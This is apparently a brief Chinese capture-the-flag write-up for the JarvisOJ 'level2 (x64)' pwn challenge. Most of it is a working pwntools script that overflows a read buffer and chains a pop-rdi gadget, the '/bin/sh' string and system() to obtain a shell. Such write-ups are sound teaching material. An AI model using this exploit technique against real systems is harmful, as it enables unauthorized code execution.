jarvisoj——[XMAN]]level2(x64)
程序员文章站
2022-07-15 15:37:37
...
题目
Wp
这里检查一下基础项
这里看了一下,发现还是read这里出现了问题,需要进行覆盖
构造一下payload
from pwn import *
r=process("./level2_x64")
#r=remote('pwn2.jarvisoj.com',9882)
e=ELF('./level2_x64')
sys_addr=e.symbols['system']
bin_addr=e.search("/bin/sh").next()
pop_rdi=0x4006b3
payload='a'*0x80+'b'*0x8+p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)
r.recvuntil('Input:')
r.sendline(payload)
r.interactive()